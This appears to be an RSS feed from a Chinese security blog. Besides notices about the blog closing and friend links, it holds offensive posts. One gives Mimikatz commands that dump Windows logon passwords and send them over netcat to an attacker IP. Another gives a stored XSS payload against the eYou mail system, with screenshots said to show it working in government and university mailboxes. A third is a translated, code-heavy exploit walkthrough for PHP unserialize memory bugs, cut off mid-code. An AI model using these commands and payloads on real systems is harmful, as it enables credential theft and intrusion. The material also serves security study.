<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[御龙的博客]]></title> 
<description><![CDATA[点滴的记录，汇聚无穷的知识，将为你打开一扇门，引你踏入一个未知的世界。]]></description>
<link>http://nmap.cc/</link>
<language>zh-cn</language>
<generator>www.emlog.net</generator>
<item>
    <title>江湖再见！</title>
    <link>http://nmap.cc/ycwz/205.html</link>
    <description><![CDATA[<p>此博客第一条文章发布于2013年4月，于2018年4月之后一直没有做更新，本欲关闭此博客，后来发现仍有用户访问，关闭着实可惜，也是对这么多年以来对我博客支持的人的一种不负责，本人也无精力去做更新，今日，全站静态化，仅供大家访问！感谢9年来，大家与我相伴，特此拜别，江湖再见！<br />
联系方式：<br />
root@nmap.cc<br />
留此方式与老朋友联络，不回复技术问题。</p>]]></description>
    <pubDate>Thu, 07 Jul 2022 08:09:07 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/ycwz/205.html</guid>
</item>
<item>
    <title>Mimikatz 使用小技巧</title>
    <link>http://nmap.cc/jzwl/202.html</link>
    <description><![CDATA[<div class="storycontent">
    <p>
        1.记录 Mimikatz输出：
    </p>
<pre>C:\&gt;mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit &amp;&amp; dir</pre>
    <p>
        2.将输出导入到本地文件：
    </p>
<pre>C:\&gt;mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit &gt;&gt; log.txt</pre>
    <p>
        3.将输出传输到远程机器：<br />
Attacker执行:
    </p>
<pre>E:\&gt;nc -lvp 4444</pre>
    <p>
        Victim执行:
    </p>
<pre>C:\&gt;mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444</pre>
    <p>
        192.168.52.1 为Attacker IP
    </p>
    <p>
        4.通过nc远程执行Mimikatz：<br />
Victim执行:
    </p>
<pre>C:\&gt;nc -lvp 443</pre>
    <p>
        Attacker执行:
    </p>
<pre>E:\&gt;nc.exe -vv 192.168.52.128 443 -e mimikatz.exe</pre>
    <p>
        192.168.52.128 为Victim IP
    </p>
    <p>
        若管理员有每过几天就改密码的习惯，但是<span class="wp_keywordlink_affiliate">mimikatz</span>抓取到的密码都是老密码
    </p>
    <p>
        用QuarksPwDump等抓的hash也是老hash，新密码却抓不到的情况下
    </p>
    <p>
        可以使用以下方法尝试解决
    </p>
    <p>
        <span class="wp_keywordlink_affiliate">privilege</span>::debug<br />
misc::memssp
    </p>
    <p>
        记录的结果在c:\windows\system32\mimilsa.log<br />
每次验证都会记录&nbsp;&nbsp;如 锁屏 等 &nbsp;重启失效
    </p>
    <p>
        出现如上问题是因为管理一直没注销过，都是直接断开连接，lsass进程里面还吃存放的老的。
    </p>
    <p>
        也可以直接logoff，但是这样会很明显。
    </p>
    <p>
        文件<br />
<span class="wp_keywordlink_affiliate">mimikatz</span>.<span class="wp_keywordlink_affiliate">exe</span>、sekurlsa.dll、PsExec.<span class="wp_keywordlink_affiliate">exe</span>(3389)
    </p>
    <p>
        本机终端<br />
绝对路径\mimikatz.<span class="wp_keywordlink_affiliate">exe</span> 
    </p>
<pre>privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit</pre>
    <p>
        <span class="wp_keywordlink">webshell</span><br />
绝对路径\mimikatz.exe &lt;&nbsp;绝对路径\c.txt &gt;&nbsp;绝对路径\userpass.txt<br />
———-c.txt———-
    </p>
<pre>privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit</pre>
    <p>
        ————————-
    </p>
    <p>
        远程终端<br />
psexec.exe -s cmd.exe<br />
绝对路径\mimikatz.exe
    </p>
<pre>privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit</pre>
</div>
<div class="remarks">
    本站内容均为原创，转载请务必保留署名与链接！<br />
Mimikatz 使用小技巧:https://www.webshell.cc/5343.html
</div>]]></description>
    <pubDate>Sun, 29 Apr 2018 01:56:25 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/jzwl/202.html</guid>
</item>
<item>
    <title>关于友情链接一些站点的删除</title>
    <link>http://nmap.cc/201.html</link>
    <description><![CDATA[<p>
    我的博客已经2年没有更新了，但是我的博客一直访问通畅，今天心血来潮打算检查一下友情链接，发现了好多死链接，或已经删除我博客链接的网站，所以做出了清理，且行且珍惜。
</p>
<p>
    <strong><span style="color:#E53333;">以下是所清理的站点:</span></strong>
</p>
<p>
    <span style="color:#FF9900;">DiaoSi'Blog&nbsp; http://www.3cc.pw</span><br />
<span style="color:#FF9900;">李成富的博客&nbsp; http://www.lichengfu.com</span><br />
<span style="color:#FF9900;">小成's blog&nbsp; http://www.rxc.cc</span><br />
<span style="color:#FF9900;">iick's　Blog&nbsp; http://www.freebuf.cc</span><br />
<span style="color:#FF9900;">孤独懒人&nbsp; http://sb3389.com </span><br />
<span style="color:#FF9900;">piaoyu http://piaoyu.org</span><br />
<span style="color:#FF9900;">孤独懒人 http://sb3389.com</span><br />
<span style="color:#FF9900;">落雪依然's blog http://www.wksnow.com</span><br />
<span style="color:#FF9900;">核攻击 http://lcx.cc</span><br />
<span style="color:#FF9900;">adwin's blog http://www.okadwin.com</span><br />
<span style="color:#FF9900;">小马's blog https://www.i0day.com</span><br />
<span style="color:#FF9900;">指尖上的故事-blog http://www.163tk.cn</span><br />
<span style="color:#FF9900;">hk天涯 blog http://www.hktianya.cn</span><br />
<span style="color:#FF9900;">secer's blog https://ha.cker.in</span><br />
<span style="color:#FF9900;">神坑's blog http://www.bluesmile.cc</span><br />
<span style="color:#FF9900;">xsec http://www.ixsec.org</span><br />
<span style="color:#FF9900;">刘帅's blog http://666666i.com</span><br />
<span style="color:#FF9900;">小九博客 http://99db.pw</span><br />
<span style="color:#FF9900;">代码编写未来 http://www.hackm-cn.org</span><br />
<span style="color:#FF9900;">独孤小生 http://www.dugu-niche.com</span><br />
<span style="color:#FF9900;">少帅's blog http://www.xx55aa.com</span><br />
<span style="color:#FF9900;">白帽子社工组 http://www.baimaozi.net</span><br />
<span style="color:#FF9900;">探路者博客 http://www.toreadsafe.xyz</span><br />
<span style="color:#FF9900;">益友 http://www.yiyou.bj.cn</span><br />
<span style="color:#FF9900;">any3ite http://www.any3ite.com</span><br />
<span style="color:#FF9900;">m0l0k's blog http://www.molok.ml</span>
</p>]]></description>
    <pubDate>Fri, 22 Sep 2017 07:19:31 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/201.html</guid>
</item>
<item>
    <title>关于更新。</title>
    <link>http://nmap.cc/xqsb/198.html</link>
    <description><![CDATA[<p>由于最近太忙，实在是没时间去更新。希望大家谅解。等忙过这段时间，我会持续为大家更新</p>]]></description>
    <pubDate>Wed, 04 Mar 2015 02:27:51 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/xqsb/198.html</guid>
</item>
<item>
    <title>eYou邮件系统邮件正文存储型XSS（HTML5特性并需点击）</title>
    <link>http://nmap.cc/jsjl/197.html</link>
    <description><![CDATA[<p class="detail">
    由于eyou版本号不同，下面测试代码的效果也有细微区别，但是存在漏洞原因相同。<br />
<br />
测试代码：<br />
<br />
&lt;!--[if true]&gt;&lt;img onerror=alert(1) src=--&gt;&lt;form 
action=javascript:alert(2)&gt;&lt;input type=submit&gt;&lt;input 
autofocus onfocus=alert(3)&gt;&lt;select autofocus 
onfocus=alert(4)&gt;&lt;textarea autofocus 
onfocus=alert(5)&gt;发送后打开，效果如图：<br />
<br />
某党政机关邮箱：<br />
<br />
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/0ef4336ed6f51ab23bc67557c665644c20150211050111.jpg" alt="QQ图片eyou120150121142357.jpg" width="600" />
</p>
<p class="detail">
    <br />
<br />
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/2c8162cbe6448c3efb3e86a2aa5678a120150211050111.jpg" alt="QQ图片eyou220150121142545.jpg" width="600" />
</p>
<p class="detail">
    <br />
<br />
某院校邮箱：
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/26f778983701064d8e2768433f34894d20150211050111.jpg" alt="QQ图片eyou320150121142724.jpg" width="600" />
</p>
<h3 class="detailTitle">
    漏洞证明：
</h3>
<p class="detail">
    由于eyou版本号不同，下面测试代码的效果也有细微区别，但是存在漏洞原因相同。<br />
<br />
测试代码：<br />
<br />
&lt;!--[if true]&gt;&lt;img onerror=alert(1) src=--&gt;&lt;form 
action=javascript:alert(2)&gt;&lt;input type=submit&gt;&lt;input 
autofocus onfocus=alert(3)&gt;&lt;select autofocus 
onfocus=alert(4)&gt;&lt;textarea autofocus 
onfocus=alert(5)&gt;发送后打开，效果如图：<br />
<br />
某党政机关邮箱：<br />
<br />
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/0ef4336ed6f51ab23bc67557c665644c20150211050111.jpg" alt="QQ图片eyou120150121142357.jpg" width="600" />
</p>
<p class="detail">
    <br />
<br />
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/2c8162cbe6448c3efb3e86a2aa5678a120150211050111.jpg" alt="QQ图片eyou220150121142545.jpg" width="600" />
</p>
<p class="detail">
    <br />
<br />
某院校邮箱：
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/26f778983701064d8e2768433f34894d20150211050111.jpg" alt="QQ图片eyou320150121142724.jpg" width="600" />
</p>]]></description>
    <pubDate>Wed, 11 Feb 2015 05:00:37 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/jsjl/197.html</guid>
</item>
<item>
    <title>PHP中的内存破坏漏洞利用（CVE-2014-8142和CVE-2015-0231）</title>
    <link>http://nmap.cc/jsjl/196.html</link>
    <description><![CDATA[<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    作者：Cigital公司的安全顾问Qsl1pknotp
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    题目：Exploiting memory corruption bugs in PHP (CVE-2014-8142 and CVE-2015-0231) Part 1
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    地址：http://www.inulledmyself.com/2015/02/exploiting-memory-corruption-bugs-in.html
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    很多人都认为，对基于Web的应用程序来说，内存崩溃类bug不是什么严重问题。尤其现在XSS和SQL注入类漏洞仍然大行其事的情况下，不会有多少注意力投入到这类bug中，它们会被当做“不可利用”或者被直接无视。然而，假如攻击成功，利用这类漏洞进行攻击所导致的结果将远远超出SQL注入以及XSS，因为：
</p>
<pre class="prettyprint prettyprinted" style="padding:5px;font-size:1em;background-color:#EFEFEF;color:#333333;border:1px solid #CCCCCC;line-height:20px;"><code><span class="lit" style="color:#006666;">1.</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">攻击者将得到有保证的系统访问权。</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">2.</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">将会很难识别恶意攻击数据流量。</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">3.</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">需要维护者/供应商提供专门补丁，并且只能希望修补得没有问题。</span></code></pre>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    接下来笔者将发表三篇该系列攻击的文章，本文是其中的首篇。该系列将从CVE-2014-8142的利用开始讲起、然后是远程任意信息泄露、最后以获取PHP解释器的控制权结束。Stefan Esser（@i0n1c）是这两个CVE的原作者，并且是在2010年Syscan上第一个讲解如何控制PHP解释器（被称为“ret2php”）的。
</p>
<h1 style="font-size:0.9em;color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    0x01 漏洞起源
</h1>
<hr style="border-style:solid none none;border-top-color:#CCCCCC;color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;" />
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    这一切都始于2004年，Esser在unserialize()函数中发现的一个Use After Free漏洞。这是一个Hardened-PHP（译者注：如果项目中，服务器的安全性是最重要的，就可以称为是Hardened-PHP）项目的一部分，没有任何代码公开。2010年，Esser又在SPLObjectStorage的unserialize()中发现另一个User After Free，这个漏洞直接产生了Syscan会上的一个发言，跟第一次漏洞一样，本次也没有代码公开。最后，CVE-2014-8142被发现，又被打补丁，但是因为补丁没打好，又导致了CVE-2015-0231。
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    幸运的是，这次Stefan终于给出了一个可令PHP解释器产生故障的POC。下面的代码就会导致有此漏洞的PHP解释器出现问题。
</p>
<pre class="prettyprint prettyprinted" style="padding:5px;font-size:1em;background-color:#EFEFEF;color:#333333;border:1px solid #CCCCCC;line-height:20px;"><span class="pun" style="color:#666600;">&lt;?</span><span class="pln" style="color:#000000;">php </span><span class="kwd" style="color:#000088;">for</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$i</span><span class="pun" style="color:#666600;">=</span><span class="lit" style="color:#006666;">4</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $i</span><span class="pun" style="color:#666600;">&lt;</span><span class="lit" style="color:#006666;">100</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $i</span><span class="pun" style="color:#666600;">++)</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">{</span><span class="pln" style="color:#000000;"> var_dump</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$i</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> $m </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> </span><span class="kwd" style="color:#000088;">new</span><span class="pln" style="color:#000000;"> </span><span class="typ" style="color:#660066;">StdClass</span><span class="pun" style="color:#666600;">();</span><span class="pln" style="color:#000000;"> $u </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> array</span><span class="pun" style="color:#666600;">(</span><span class="lit" style="color:#006666;">1</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> $m</span><span class="pun" style="color:#666600;">-&gt;</span><span class="pln" style="color:#000000;">aaa </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> array</span><span class="pun" style="color:#666600;">(</span><span class="lit" style="color:#006666;">1</span><span class="pun" style="color:#666600;">,</span><span class="lit" style="color:#006666;">2</span><span class="pun" style="color:#666600;">,&amp;</span><span class="pln" style="color:#000000;">$u</span><span class="pun" style="color:#666600;">,</span><span class="lit" style="color:#006666;">4</span><span class="pun" style="color:#666600;">,</span><span class="lit" style="color:#006666;">5</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> $m</span><span class="pun" style="color:#666600;">-&gt;</span><span class="pln" style="color:#000000;">bbb </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">1</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $m</span><span class="pun" style="color:#666600;">-&gt;</span><span class="pln" style="color:#000000;">ccc </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">&amp;</span><span class="pln" style="color:#000000;">$u</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $m</span><span class="pun" style="color:#666600;">-&gt;</span><span class="pln" style="color:#000000;">ddd </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> str_repeat</span><span class="pun" style="color:#666600;">(</span><span class="str" style="color:#008800;">"A"</span><span class="pun" style="color:#666600;">,</span><span class="pln" style="color:#000000;"> $i</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> $z </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> serialize</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$m</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> $z </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> str_replace</span><span class="pun" style="color:#666600;">(</span><span class="str" style="color:#008800;">"bbb"</span><span class="pun" style="color:#666600;">,</span><span class="pln" style="color:#000000;"> </span><span class="str" style="color:#008800;">"aaa"</span><span class="pun" style="color:#666600;">,</span><span class="pln" style="color:#000000;"> $z</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> var_dump</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$z</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> $y </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> unserialize</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$z</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> var_dump</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$y</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">}</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">?&gt;</span></pre>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    source:&nbsp;<a href="https://gist.github.com/tmm08a/d07bfcb4eca90a6d3926#file-stefanesser_original_poc" target="_blank" class="ui-link" style="cursor:pointer;color:#3388CC;text-decoration:none;">StefanEsser_Original_POC</a>
</p>
<h1 style="font-size:0.9em;color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    0x02 漏洞分析利用
</h1>
<hr style="border-style:solid none none;border-top-color:#CCCCCC;color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;" />
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    下面来解释下POC是如何工作的：我们通过重新添加“aaa”对象的值（不同值），来更新对象“aaa”，然而“ccc”对象其实还是指向原始“aaa”对象中的某一个值。
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    既然我们已经在顶层实现上知道了它的工作原理，接下来就让我们一起试着找到问题的罪魁祸首吧。我们在process_nested_data函数中寻找，快速浏览一下，会发现一段特定的代码：
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/685e9cc2adffd57c3d6aa9946fa6956120150211045715.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    让我们一起跟进脚本中来确定真正发生了什么。我们将断点断在var_unserializer.c的第337行来看一下（此处位于process_nested_data函数内）。
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/fe04e72c81877f6850da2fe3478bac3c20150211045715.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    继续运行，跟过下面的代码：
</p>
<pre class="prettyprint prettyprinted" style="padding:5px;font-size:1em;background-color:#EFEFEF;color:#333333;border:1px solid #CCCCCC;line-height:20px;"><span class="pun" style="color:#666600;">&lt;?</span><span class="pln" style="color:#000000;">php
$data </span><span class="pun" style="color:#666600;">=</span><span class="str" style="color:#008800;">'O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:39:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}'</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $x </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> unserialize</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$data</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> var_dump</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$x</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">?&gt;</span></pre>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    source:<a href="https://gist.github.com/tmm08a/686d3f78a44c8ea80fd0#file-stefanesser_original_localmemleak-php" target="_blank" class="ui-link" style="cursor:pointer;color:#3388CC;text-decoration:none;">StefanEsser_Original_LocalMemLeak.php</a>
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    运行上面的脚本，断点第一次命中时跳过，第二次命中时，执行下面的查看命令：
</p>
<pre class="prettyprint prettyprinted" style="padding:5px;font-size:1em;background-color:#EFEFEF;color:#333333;border:1px solid #CCCCCC;line-height:20px;"><span class="pln" style="color:#000000;">printzv </span><span class="pun" style="color:#666600;">*(</span><span class="pln" style="color:#000000;">var_entries</span><span class="pun" style="color:#666600;">)</span><span class="pln" style="color:#000000;">var_hash</span><span class="pun" style="color:#666600;">-&gt;</span><span class="pln" style="color:#000000;">first</span></pre>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/592a5320ae2b13c415cbaa4eb53fed1320150211045716.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    可以看到地址的一个数组，这些地址指向unserialize()函数解析的变量值。我们感兴趣的是第五个0xb7bf87c0（我们上面php代码中用的是R:5）。既然已经得到地址，我们就去看一下内容，然后步过该断点并继续运行。
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/8945f4901ec6e0e37d53e28cba699e0e20150211045716.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    已经调用完该可疑函数，接下来重新看一下刚才我们选定的地址中出现了什么内容：
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/683477808075ddd3d18f39ed069c427f20150211045716.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    成功搞定！当然，还需要确认下该地址是否还在var_hash表中，然后继续运行。
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/075d890df041d389ce7a111722aabfc220150211045716.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    果然还在，继续：
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/f35e17219cdf6db6ab8ea39ae842f6a620150211045716.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    Sweet！已经可以泄露前面地址中的数据了。我们现在已经可以成功泄露出之前所提供字串的长度，但这其实没什么意思。那么能不能泄露出任意内存数据呢？下面就是你想要的代码：
</p>
<pre class="prettyprint prettyprinted" style="padding:5px;font-size:1em;background-color:#EFEFEF;color:#333333;border:1px solid #CCCCCC;line-height:20px;"><span class="pun" style="color:#666600;">&lt;?</span><span class="pln" style="color:#000000;">php
$fakezval </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> pack</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;"> </span><span class="str" style="color:#008800;">'IIII'</span><span class="pun" style="color:#666600;">,</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//unsigned int</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">0x08048000</span><span class="pun" style="color:#666600;">,</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//address to leak</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">0x0000000f</span><span class="pun" style="color:#666600;">,</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//length of string</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">0x00000000</span><span class="pun" style="color:#666600;">,</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//refcount</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">0x00000006</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//data type NULL=0,LONG=1,DOUBLE=2,BOOL=3,ARR=4,OBJ=5,STR=6,RES=7</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//obj from original POC by @ion1c</span><span class="pln" style="color:#000000;"> $obj </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> </span><span class="str" style="color:#008800;">'O:8:"stdClass":4:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;a:1:{i:0;i:1;}i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;s:3:"ddd";s:4:"AAAA";}'</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $obj</span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;">unserialize</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$obj</span><span class="pun" style="color:#666600;">);</span><span class="pln" style="color:#000000;"> </span><span class="kwd" style="color:#000088;">for</span><span class="pun" style="color:#666600;">(</span><span class="pln" style="color:#000000;">$i </span><span class="pun" style="color:#666600;">=</span><span class="pln" style="color:#000000;"> 